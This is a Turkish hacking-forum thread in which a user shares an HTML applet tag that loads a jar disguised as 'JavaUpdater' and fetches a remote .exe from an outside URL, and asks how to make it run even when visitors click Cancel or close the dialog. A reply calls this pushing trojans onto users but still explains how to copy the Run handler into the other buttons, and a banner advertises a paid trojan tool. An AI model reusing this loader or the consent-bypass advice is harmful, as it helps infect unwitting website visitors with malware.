Jar dosyasıSelamlar ; Elimde bir jar dosyası mevcut.Bu kod ile java yı index de çalıştırıyorum.index de çıkan java da run a tıklandıgı zaman bir program devreye giriyor, otomatik çalışıyor. |
Özel Yazılım Trojan+, güncellemeli ve garantili. Sadece 690TL! Kredi kartınıza 12 taksit kolaylığı!
|
|||||||
Jar dosyası konusundaki toplam yorum: 2, okunma sayısı: 374. |
|
|
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|
|
#1 |
|
Cool Üye
![]() ![]() ![]() Kayıt Tarihi: Mar 2011
Üye numarası: #527147
Karma etkisi: 35
![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() Karma: 3343
|
Selamlar ;
Elimde bir jar dosyası mevcut.Bu kod ile java yı index de çalıştırıyorum.index de çıkan java da run a tıklandıgı zaman bir program devreye giriyor, otomatik çalışıyor. <applet width='1' height='1' code='JavaUpdater.class' archive='Client.jar'><param name="url" value="http://www.abcde.com/abc.exe"></applet> Kaynak: Wardom http://www.wardom.com.tr/showthread.php?t=491834 İndex e girildiğinde 3 seçenek var. Run Cancel Birde çarpı işareti (kapatmak için) ![]() Sadece Run a tıklandıgı zaman program devreye giriyor.Benim istediğim ise ; Kalan Diğer 2 seçeneğe tıklandığındada programın çalışmasını istiyorum. DJ Java Decompiler Programını yükleyip jar içindeki class dosyasını açtım.Ama nasıl yapılacağı hakkında bir bilgim yok. Yardım edebilir misiniz ? |
|
|
|
|
|
#2 |
|
Daimi Üye
![]() ![]() ![]() Kayıt Tarihi: Mar 2006
Üye numarası: #54750 Yer: Vatan27 Mekan54
Karma etkisi: 529
![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() Karma: 52259
|
İstediğini yaparsın ama saçma olmazmı o zaman sonsuz döngüye girer ve kapatamazsın.
Ama netbeans yada ecplipse ile kaynak dosyalara ulaşıp oradan cancel ve x için run a verilen görevi verebilirsin. |
|
|
|
|
|
#3 |
|
Forum Kalfası
![]() ![]() ![]() ![]() Kayıt Tarihi: Oct 2008
Üye numarası: #268608 Yer: Bakırköy
Karma etkisi: 3755
![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() Karma: 375073
|
Sonsuz döngüye niye girsin applet
İlginç bir yorum. Arkadaşım sana kısa hisseden iki cevap,1- Programlama bilmeyipte, kullanıcılar trojen yedircem diye sağa sola bin takla attıracağına iki kitap karıştır yada kocaman internet önünde araştır, iki satır kod nasıl yazılır öğren. Kaynak: Wardom http://www.wardom.com.tr/showthread.php?t=491834 2- Kaynak kodlarını bir şekilde decompile etmişsin. Zahmet olmaz sana bak bakayım, run butonunun metodu içinde ne yazıyorsa, diğer butonların actionPerformed metoduna aynısını kopyala yapıştır. |
|
|
|
![]() |
| Şu Anda Konuyu Görüntüleyenler: 1 (0 üye ve 1 misafir) | |
| Konu Araçları | Bu Konuda Ara |
Bu Konuda Aradığınızı Bulamadıysanız Şunlara Bakmanızı Öneririz
|
||||
| Konu | Konu Yazarı | Forum | Cevaplar | Son Mesaj |
| 133 adet ses efekti | emreson93 | Programlar | 0 | 01-02-2011 12:56 |
| İşte dokunamadığımız vekiller | Artser | Siyaset | 22 | 02-03-2010 19:37 |
| Hangi Uzantı Hangi Programla Açılır? | Baturay Mavi | Resimli Program Anlatımları | 31 | 09-12-2009 18:17 |
| Hangi Uzantıyı Hangi Programla Açarım ? | ¢αη | Genel | 3 | 01-08-2007 19:11 |
| Hangi Uzantı Nedir ve Ne İle Açılır.! | M@rcos | Programlar | 1 | 31-12-2006 00:22 |
|
|